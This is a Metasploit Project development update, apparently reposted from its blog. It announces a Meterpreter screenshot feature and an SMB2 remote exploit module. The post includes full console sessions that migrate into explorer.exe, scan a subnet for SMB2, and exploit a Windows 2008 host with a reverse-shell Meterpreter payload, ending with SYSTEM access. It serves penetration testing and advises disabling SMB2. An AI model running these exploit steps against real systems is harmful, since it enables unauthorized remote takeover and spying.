本文共 4102 字,大约阅读时间需要 13 分钟。
The last 48 hours has been a of development at the Metasploit Project as we prepare for the 3.3 stable release. Efrain Torres completed the screenshot feature of the espia Metepreter module. This command only works when the process meterpreter is executing inside has access to the active desktop (like explorer.exe). You can see an example of this below:
meterpreter > psProcess list============PID Name Path--- ---- ----204 iexplore.exe C:/Program Files/Internet Explorer/iexplore.exe[ snipped ]1736 Explorer.EXE C:/WINDOWS/Explorer.EXE3348 sol.exe C:/WINDOWS/system32/sol.exemeterpreter > migrate 1736[*] Migrating to 1736...[*] Migration completed successfully.meterpreter > screenshot /tmp/boom.bmp[*] Image saved to /tmp/boom.bmpOpening browser to image.This morning released his long-awaited for the Metasploit Framework. He plans to publish a whitepaper in the near future that discusses the exploit technique and the newly written Vista/2008 ring0 to ring3 stager code. This module is available in the 3.3-dev tree and supports Vista SP1/SP2 and 2008 SP1/SP2 (but not R2) with the same offsets and addresses. Keep in mind that the best workaround for this still-unpatched flaw is to . The auxiliary module "auxiliary/scanner/smb/smb2" can be used to scan the network for systems that still have SMB2 enabled (shown below):msf> use auxiliary/scanner/smb/smb2msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24msf (auxiliary/smb2) > set THREADS 100msf (auxiliary/smb2) > run[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hoursWhen using Metasploit on Windows XP, socket restrictions prevent scanners from working at their full speed. We recommend using anything but XP (2000, Vista, 7) if you need to use the scanning modules inside Metasploit on Windows. Alternatively, boot the BackTrack4 Virtual Machine in VMWare. Now that we have identified two systems with SMB2 enabled, its exploit time!msf> use exploit/windows/smb/smb2_negotiate_func_indexmsf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcpmsf (exploit/smb2) > set LHOST 192.168.0.136msf (exploit/smb2) > set LPORT 5678msf (exploit/smb2) > set RHOST 192.168.0.211msf (exploit/smb2) > exploit[*] Started reverse handler[*] Connecting to the target (192.168.0.211:445)...[*] Sending the exploit packet (854 bytes)...[*] Waiting up to 180 seconds for exploit to trigger...[*] Sending stage (719360 bytes)[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)meterpreter > sysinfoComputer: WIN-UAKGQGDWLX2OS : Windows 2008 (Build 6001, Service Pack 1).Arch : x86Language: en_USmeterpreter > getuidServer username: NT AUTHORITY/SYSTEMVoila! A great way to justify disabling SMB2 across your network.Next item of interest -- we are now generating hourly builds of the 3.3-dev tree and making these available for download from the Metasploit web site. These come in two flavors and two sizes. We are offering the 3.3-dev package for Unix systems in both and versions. The Mini version removes the SVN directories, many of the development source files, and the msfweb/msfgui interfaces.For the first time, we are offering 3.3-dev packages for Windows (based on Cygwin 1.7 [HEAD]), also in and versions. The Windows installer is lightweight and can be installed alongside an existing version of Metasploit. The Windows version can be installed to a USB key and made portable, just by specifying the proper path during the install. Finally, the Windows installer can be made to run in batch mode with a command line like the following:C:/> framework-3.3-dev-mini.exe /S /D=C:/metasploit33devWe would like to make sure everyone is aware of the freely-available Online Course developed by the Offensive Security team. The Metasploit Project is currently working with the team to expand the breadth and depth of this online course, with help from our own official Metasploit courseware. This course should continue to improve at rapid rate over the next few months.转载地址:http://ogmmb.baihongyu.com/